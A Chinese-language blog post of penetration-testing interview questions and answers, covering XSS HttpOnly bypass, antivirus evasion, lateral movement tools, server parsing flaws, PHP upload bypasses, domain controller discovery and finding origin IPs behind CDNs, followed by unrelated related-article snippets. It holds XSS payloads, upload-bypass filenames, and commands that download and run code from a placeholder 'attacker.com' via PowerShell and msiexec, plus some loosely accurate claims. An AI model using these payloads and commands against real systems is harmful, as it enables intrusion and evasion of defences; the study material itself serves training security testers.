2025年渗透测试面试题总结-29(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

二百四十一、XSS 设置Http-Only如何绕过

二百四十二、XSS攻击手段分类

二百四十三、高杀软覆盖工作组的渗透策略

二百四十四、内网横向工具选型

二百四十五、fscan扫描崩溃处理

二百四十六、Apache/IIS解析漏洞

二百四十七、PHP文件上传绕过

黑名单绕过

白名单绕过

解析漏洞利用

二百四十八、工作组横向权限要求

二百四十九、域控定位方法大全

二百五十、CDN真实IP溯源

二百四十一、xss 设置http-only如何绕过二百四十二、xss攻击手段有哪些二百四十三、遇到全是杀软的工作组怎么办二百四十四、使用什么工具内网横向二百四十五、fscan扫机器崩了怎么办二百四十六、apache iis 解析漏洞是什么二百四十七、php文件上传绕过方式(黑、白名单、解析漏洞)二百四十八、工作组横向需要用户什么权限二百四十九、如何查找域控(尽可能多的方式)二百五十、如何从cdn 真实ip

二百四十一、XSS 设置Http-Only如何绕过

4类绕过技术

  1. 浏览器漏洞利用
    • 特定浏览器版本(如Chrome < v83)存在Document.cookie API绕过漏洞。
  2. 跨域劫持(CORS滥用)
    • 利用配置错误的Access-Control-Allow-Origin: *,通过XHR请求带凭证访问目标域:
    javascriptfetch('https://target.com/data', {credentials: 'include'}).then(...)
  3. 服务端请求伪造(SSRF+XSS组合)
    • 通过XSS触发内网SSRF,间接获取含Cookie的响应(需存在SSRF漏洞)。
  4. 客户端缓存嗅探
    • 读取浏览器缓存中未标记HttpOnly的敏感数据(如localStorage中的Token)。

二百四十二、XSS攻击手段分类

5大攻击类型及代表手法

类型原理案例
反射型XSS恶意脚本通过URL参数注入http://site.com?search=<script>alert(1)</script>
存储型XSS脚本持久化存储到数据库评论区植入恶意JS,影响所有访问者
DOM型XSS前端JS解析漏洞导致执行eval(location.hash.slice(1))
盲打XSS攻击后台管理界面表单字段注入,等待管理员触发
mXSSHTML解析变异导致过滤失效<img src="x" onerror=alert(1)> 被错误净化

二百四十三、高杀软覆盖工作组的渗透策略

免杀与隐蔽渗透方案

  1. 无文件攻击
    • PowerShell内存加载:
      powershellIEX(New-Object Net.WebClient).DownloadString('http://attacker.com/amsi-bypass.ps1') 
  2. 合法工具滥用(LOLBAS)
    • 使用微软签名的二进制文件执行操作:
      cmdmsiexec /i http://attacker.com/payload.msi /quiet
  3. 网络层隐蔽
    • 使用ICMP/DNS隧道通信(工具:DNSCat2)。
  4. 进程注入
    • 注入到可信进程(如explorer.exe )绕过内存扫描。
  5. 硬件级后门
    • 利用网卡固件漏洞(如Intel NIC)实现持久化。

二百四十四、内网横向工具选型

按场景匹配工具

目标推荐工具关键参数
主机发现arp-scan, nmap -sn--localnet 扫描本地网段
服务爆破Hydra, Medusa-L user.txt -P pass.txt smb://
票据传递Impacket-psexec-k -no-pass 使用Kerberos票据
漏洞利用Metasploit, CobaltStrikeuse exploit/windows/smb/psexec
隐蔽通信CobaltStrike BeaconHTTPS监听+SOCKS代理

二百四十五、fscan扫描崩溃处理

稳定性优化方案

  1. 限制并发与超时
    bash./fscan -h 192.168.1.0/24 -t 64 -timeout 3 
    • -t 64:线程数≤64
    • -timeout 3:单主机超时3秒
  2. 分片扫描
    bashsplit -l 100 targets.txt && for i in x*; do ./fscan -hf $i; done 
  3. 内存释放优化
    • 使用ulimit -v unlimited解除内存限制。
  4. 分布式扫描
    • 将目标列表分割到多台VPS执行。

二百四十六、Apache/IIS解析漏洞

服务器解析漏洞详解

服务器漏洞版本利用方式
Apache1.x/2.x(配置错误)上传test.php.jpg 触发PHP执行
IIS 6.0Win2003/shell.asp;.jpg 执行ASP代码
IIS 7.0+配置FastCGI错误上传.php文件改名为shell.jpg/.php
Nginx<0.8.37shell.jpg%00.php 截断解析

二百四十七、PHP文件上传绕过

黑白名单对抗技术

黑名单绕过
  1. 后缀大小写变形Shell.PhP
  2. 双写后缀shell.pphphp → 过滤后为shell.php
  3. 特殊后缀.phtml, .php5, .phar
白名单绕过
  1. %00截断shell.jpg%00.php (需PHP<5.3.4)
  2. 路径拼接
    phpmove_uploaded_file($_FILES["file"]["tmp_name"], "/uploads/" . $_GET["dir"] . "/" . $filename);
    通过?dir=shell.php%00 截断
解析漏洞利用
  • 结合Apache多后缀解析:shell.php.xxx → 若.xxx未定义,则向前识别为PHP

二百四十八、工作组横向权限要求

必需的最小权限

  1. SMB协议
    • 目标主机的本地管理员凭证(或SMB共享写入权限)。
  2. WMI执行
    • 本地管理员权限 + 防火墙放行135/445端口。
  3. PsExec
    • 管理员凭据 + ADMIN$共享访问权限。
  4. 计划任务
    • 需加入本地管理员组(或Task Scheduler服务权限)。

二百四十九、域控定位方法大全

7种高效定位技术

  1. DNS查询
    powershellnslookup -type=SRV _ldap._tcp.dc._msdcs.domain.com 
  2. 端口扫描
    • 定位389(LDAP)/636(LDAPS)/88(Kerberos)端口开放主机。
  3. NetBIOS信息
    cmdnbtstat -A 192.168.1.1 # 查找<1C>记录(域控制器) 
  4. 活动目录模块
    powershellGet-ADDomainController -Discover -Service PrimaryDC 
  5. 日志分析
    • 事件ID 4662(对象访问日志)中定位CN=Domain Controllers
  6. SPN扫描
    bashsetspn -T domain.com -Q */*
  7. 默认组策略路径
    • \\domain.com\SYSVOL\domain.com\Policies 仅域控可写。

二百五十、CDN真实IP溯源

6层探测技术

  1. 历史DNS记录
    • 查询securitytrails.com 获取历史A记录。
  2. 子域名爆破
    • 使用amass扫描未接入CDN的子域(如test.example.com )。
  3. SSL证书匹配
    • 通过crt.sh 搜索相同证书的IP。
  4. 邮件服务器溯源
    • 分析邮件头Received字段中的原始IP。
  5. 协议漏洞探测
    • 发送HTTP 1.0请求异常Host头(如Host: 127.0.0.1)触发CDN转发错误。
  6. 全球Ping监测
    • 通过viewdns.info 对比全球节点响应差异。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/news/920202.shtml
繁体地址,请注明出处:http://hk.pswp.cn/news/920202.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

如何用Wireshark捕获当前房间路由器和主机的数据包

一、前期工作 在我的这篇文章中&#xff1a; Wireshark USRP联合波形捕获&#xff08;上&#xff09;-CSDN博客 通过192.168.1.103这个主机ip筛选Wireshark捕获的数据包&#xff0c;认为Source和Direction中至少一个包含192.168.1.103才能代表路由器和主机之间的WiFi信号。 …

深度解析游戏引擎中的相机:视图矩阵

在现代游戏引擎中&#xff0c;相机系统是不可或缺的一部分。它决定了玩家在游戏中看到的视角和场景。而视图矩阵作为相机系统的核心组件之一&#xff0c;起到了至关重要的作用。本文将深入探讨视图矩阵的原理、计算方法及其在游戏引擎中的应用。 视图矩阵的基本概念 视图矩阵…

96、23种设计模式之原型模式(5/23)

原型模式&#xff08;Prototype Pattern&#xff09;是创建型设计模式的一种&#xff0c;其核心思想是通过复制现有对象&#xff08;原型&#xff09;来创建新对象&#xff0c;而非通过构造函数或工厂方法从头构建。该模式将对象的创建过程从构造逻辑转移到复制操作&#xff0c…

【python与生活】如何用Python写一个简单的自动整理文件的脚本?

用 Python 写一个自动整理文件的脚本很简单&#xff0c;核心思路是&#xff1a;按文件后缀&#xff08;如 .jpg、.pdf&#xff09;将文件分类&#xff0c;移动到对应的文件夹&#xff08;如「图片」「文档」&#xff09;中。以下是一个实用的实现方案&#xff0c;新手也能轻松修…

SELinux相关介绍

目录 1.SELinux 概述 2.SELinux 的执行模式 3.SELinux 的使用 1.SELinux 概述 SELinux&#xff08; Security Enhanced Linux 安全性增强的Linux&#xff09;&#xff0c;由美国国家安全局 NSA&#xff08;National Security Agency&#xff09;开发&#xff0c;构建与 Kernel …

【C语言练习】汉诺塔

一、题目 介绍&#xff1a;汉诺塔&#xff08;Tower of Hanoi&#xff09;&#xff0c;又称河内塔&#xff0c;是一个源于印度古老传说的益智玩具。大梵天创造世界的时候做了三根金刚石柱子&#xff0c;在一根柱子上从下往上按照大小顺序摞着64片黄金圆盘。大梵天命令婆罗门把圆…

随机森林实战:在鸢尾花数据集上与决策树和逻辑斯蒂回归进行对比

前言 集成学习通过组合多个模型的优势&#xff0c;常能获得比单一模型更优的性能&#xff0c;随机森林便是其中的典型代表。它基于 Bagging 思想&#xff0c;通过对样本和特征的双重随机采样&#xff0c;构建多棵决策树并综合其结果&#xff0c;在降低过拟合风险的同时&#xf…

(计算机网络)TCP 三握中第三次 ACK 丢失会发生什么?

在 TCP 的三次握手过程中&#xff0c;如果 第三次 ACK 丢失&#xff0c;TCP 是如何保证连接可靠建立的呢&#xff1f;1️⃣ 场景说明第三次 ACK&#xff1a;客户端发送给服务器的 ACK&#xff0c;确认服务器的 SYN-ACK。假设该 ACK 在网络传输过程中丢失。2️⃣ 客户端状态客户…

容智Report Agent2.0重磅发布!重新定义企业数据分析AI时代

在数据成为生产要素之一的今天&#xff0c;很多企业依然面临这样的困境&#xff1a; 想要一份年度财务分析&#xff0c;财务团队可能要忙半个月甚至一个月&#xff1b;想查一个业务指标&#xff0c;要先找出在哪个系统&#xff0c;再申请权限、写SQL、调报表&#xff0c;折腾半…

高阶数据结构---ST表

hello大家好&#xff0c;今天是2025年8月23日&#xff0c;我要来给大家分享的是一个高阶数据结构---ST表。 一&#xff1a;引入 1.RMQ问题&#xff1a; 对于一个长度为 n 的序列&#xff0c;有 m 次查询操作&#xff0c;每次查询为一个区间 [l&#xff0c;r] 的最大值&#…

docker 安装nacos(vL2.5.0)

查找nacos 的所需的镜像版本 https://hub.docker.com/r/nacos/nacos-server/tags 拉取你所需的版本&#xff08;我们用v2.5.0&#xff09; docker pull nacos/nacos-server:v2.5.0 注意&#xff1a;因为我们需要挂载外配置文件 直接用volume 挂载目录 缺少初始文件报错 我们…

在github上通过dmca数字版权申诉侵权并删除侵权仓库

DMCA是什么&#xff1f; 《数字千年版权法案》&#xff08;DMCA&#xff09;为版权所有者&#xff08;包括软件开发人员&#xff09;创建了一个标准化的流程&#xff0c;要求GitHub删除侵权内容。您可以在美国版权局的官方网站上找到有关DMCA的更多信息。有关GitHub如何处理DM…

AI安全监控与人才需求的时间悖论(对AI安全模型、AI安全人才需求的一些思考)

当监控者与被监控者都是AI时&#xff0c;谁来监控监控者&#xff1f;这个看似简单的问题&#xff0c;却揭示了人工智能安全领域的根本性困境。一、问题的提出&#xff1a;当AI监控AI 随着大语言模型和生成式AI的快速发展&#xff0c;AI系统在元认知层面的能力越来越强&#xff…

AI模型部署 - 大型语言模型(LLM)推理部署中的实际显存评估

目录 第一部分:大型语言模型(LLM)推理显存占用的核心原理 1.1 显存占用的主要构成部分 1.2 影响显存占用的关键因素 1.2.1 模型架构:MoE vs. 稠密模型 1.2.2 上下文长度与并发数 1.2.3 部署方式与推理框架 1.2.4 硬件能力 第二部分:显存占用的精确计算方法 2.1 模…

【大语言模型 16】Transformer三种架构深度对比:选择最适合你的模型架构

【大语言模型 16】Transformer三种架构深度对比&#xff1a;选择最适合你的模型架构 关键词&#xff1a;Transformer架构&#xff0c;Encoder-Only&#xff0c;Decoder-Only&#xff0c;Encoder-Decoder&#xff0c;BERT&#xff0c;GPT&#xff0c;T5&#xff0c;模型选择&…

【LeetCode 热题 100】31. 下一个排列

Problem: 31. 下一个排列 文章目录整体思路完整代码时空复杂度时间复杂度&#xff1a;O(N)空间复杂度&#xff1a;O(1)整体思路 这段代码旨在解决经典的 “下一个排列” (Next Permutation) 问题。问题要求重新排列一个整数数组&#xff0c;使其变为字典序上的下一个更大的排列…

【Linux 进程】进程程序替换

文章目录1.进程替换的六个库函数2.execl1.进程替换的六个库函数 使用 man 3 execl 进行查询&#xff0c;3表示 Linux 中的3号手册&#xff0c;即为库函数&#xff08;例如C标准库中的库函数&#xff0c;printf&#xff0c;malloc&#xff09; man 1: 用户命令&#xff08;在sh…

ReasonRank: Empowering Passage Ranking with Strong Reasoning Ability

主要内容总结 本文提出了一种具有强推理能力的列表式段落重排序模型ReasonRank,旨在解决现有重排序模型在推理密集型场景(如复杂问答、数学问题、代码查询等)中表现不佳的问题,核心原因是这类场景缺乏高质量的推理密集型训练数据。 为解决这一问题,研究团队: 设计了自动…

不卡顿、不掉线!稳定可靠的体育赛事直播系统源码解析

在体育和电竞行业&#xff0c;实时直播系统已经成为平台的标配。无论是 OTT、比分直播网站&#xff0c;还是综合类体育社区&#xff0c;用户对直播体验的要求越来越高&#xff1a;不卡顿、不掉线、实时性强。那么&#xff0c;从技术角度出发&#xff0c;一个稳定可靠的 体育赛事…

三菱FX5U PLC访问字变量的某一位

三菱FX5U PLC气缸控制功能块 三菱FX5U气缸控制功能块(完整ST源代码+示例程序)_三菱fx5u标签气缸报警程序功能块-CSDN博客文章浏览阅读560次,点赞5次,收藏2次。如果机器包含100个气缸,我们只需要修改数组的元素数量就可以了,效率非常的高。待续....博途PLC 面向对象系列之“…